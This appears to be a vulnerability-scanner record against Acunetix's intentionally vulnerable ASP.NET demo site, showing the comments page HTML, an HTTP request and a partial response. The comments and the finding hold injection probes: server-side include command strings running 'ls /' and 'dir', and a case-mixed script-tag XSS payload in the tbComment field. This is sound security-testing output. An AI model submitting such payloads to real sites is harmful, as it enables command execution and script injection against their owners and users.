2lmIj5kAjMPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAI0D2QWAmYPFgIfAwUHQ29tbWVudGQCNQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCNg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAjcPZBYCZg8WAh8DBQdDb21tZW50ZAI4D2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAI5D2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCOg9kFgJmDxYCHwMFB0NvbW1lbnRkAjsPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAjwPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAI9D2QWAmYPFgIfAwUHQ29tbWVudGQCPg9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCPw9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAkAPZBYCZg8WAh8DBQdDb21tZW50ZAJBD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAJCD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCQw9kFgJmDxYCHwMFB0NvbW1lbnRkAkQPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kZHn+yaTFT2gDIyMRHwvAXbto4AeB" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKOvdGFDAKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOX3LDo5IzqFrV/0RCO6UXlxVLwH" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText"><!--#EXEC cmd="dir \"--></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:51 AM</DIV><DIV class="CommentText">"><!--#EXEC cmd="ls /"--><</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:01 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:51 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:51 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:51 AM</DIV><DIV class="CommentText"><!--#EXEC cmd="ls /"--></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:50 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText">0W45pz4p</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText"></div><scrIpt>alert(1);</scRipt><div></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:01 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText">"><!--#EXEC cmd="dir \"--><</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:51 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA">hvEYyWNN</textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	POST
Parameter	tbComment
Attack	</div><scrIpt>alert(1);</scRipt><div>
Evidence	</div><scrIpt>alert(1);</scRipt><div>
Show / hide Request and Response
Request Header - size: 593 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1436 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,436 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv&tbComment=%3C%2Fdiv%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3Cdiv%3E&btnSend=Send+comment
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:43:00 GMT Content-Length: 23946
Response Body - size: 23,946 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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